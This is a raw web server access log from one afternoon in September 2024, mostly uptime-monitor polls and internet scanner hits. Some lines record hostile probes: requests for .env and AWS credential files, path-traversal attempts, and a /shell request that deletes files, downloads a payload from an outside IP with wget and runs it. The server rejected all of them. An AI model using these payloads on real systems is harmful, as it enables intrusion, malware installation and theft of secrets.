167.94.138.48 - - [02/Sep/2024:15:25:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.48 - - [02/Sep/2024:15:25:30 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:25:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.52.167 - - [02/Sep/2024:15:25:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:15:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.251 - - [02/Sep/2024:15:26:23 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:15:26:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [02/Sep/2024:15:27:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:15:27:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:15:28:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:28:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:30:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:15:30:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:31:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:32:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:33:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:34:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:35:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.36.106.134 - - [02/Sep/2024:15:36:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 7_0_2; Win64; x64) AppleWebKit/546.35 (KHTML, like Gecko) Chrome/51.0.2934 Safari/537.36"
101.36.106.134 - - [02/Sep/2024:15:36:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
101.36.106.134 - - [02/Sep/2024:15:36:11 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
101.36.106.134 - - [02/Sep/2024:15:36:11 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
101.36.106.134 - - [02/Sep/2024:15:36:15 +0200] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
101.36.106.134 - - [02/Sep/2024:15:36:15 +0200] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
101.36.106.134 - - [02/Sep/2024:15:36:16 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
185.191.126.213 - - [02/Sep/2024:15:36:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:36:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:37:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:38:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.173 - - [02/Sep/2024:15:39:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:39:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:40:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:15:40:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:15:40:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:41:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:42:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:43:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.52.22 - - [02/Sep/2024:15:43:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:43:53 +0200] "GET /console HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:44:04 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:44:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:44:21 +0200] "GET /index.jsp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:15:44:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
193.118.52.22 - - [02/Sep/2024:15:44:36 +0200] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:15:44:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.52.22 - - [02/Sep/2024:15:44:49 +0200] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:01 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:01 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:01 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:01 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:01 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:01 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:14 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:26 +0200] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:26 +0200] "GET /aspera/faspex/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:26 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:15:45:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.52.22 - - [02/Sep/2024:15:45:40 +0200] "GET /api/session/properties HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:54 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:45:55 +0200] "GET /identity HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:07 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:07 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:20 +0200] "GET /WebInterface/ HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:32 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:15:46:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:46:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.52.22 - - [02/Sep/2024:15:46:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:45 +0200] "GET /zabbix/favicon.ico HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:57 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:57 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.52.22 - - [02/Sep/2024:15:46:57 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:15:47:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:15:48:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:48:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:49:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:15:50:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:50:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:51:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:52:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:53:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:54:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [02/Sep/2024:15:55:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:15:55:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.24.124.11 - - [02/Sep/2024:15:56:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:56:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:15:56:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /.env_example HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:16 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:15:57:17 +0200] "GET /info HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
112.120.65.115 - - [02/Sep/2024:15:57:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:15:57:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:58:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:59:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:00:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:16:01:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:01:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:16:02:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:02:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:03:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:04:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:16:04:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:16:05:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:16:05:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.172.223 - - [02/Sep/2024:16:05:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
165.154.172.223 - - [02/Sep/2024:16:05:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.154.172.223 - - [02/Sep/2024:16:05:55 +0200] "t3 12.1.2" 400 329 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:06:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:16:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:07:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:16:08:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:08:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:09:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.53 - - [02/Sep/2024:16:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.53 - - [02/Sep/2024:16:10:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [02/Sep/2024:16:10:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [02/Sep/2024:16:10:17 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:10:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:11:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.231.58.180 - - [02/Sep/2024:16:12:23 +0200] "POST /api/login HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:16:12:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:13:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.231.58.180 - - [02/Sep/2024:16:14:07 +0200] "POST /api/login HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:16:14:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.251 - - [02/Sep/2024:16:14:54 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:16:15:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [02/Sep/2024:16:16:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
45.148.10.251 - - [02/Sep/2024:16:16:39 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:16:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.36.91 - - [02/Sep/2024:16:17:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:17:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:16:18:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.251 - - [02/Sep/2024:16:18:29 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:16:18:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:19:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:21:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:22:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.56.138.96 - - [02/Sep/2024:16:23:15 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [02/Sep/2024:16:23:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:16:24:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:24:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
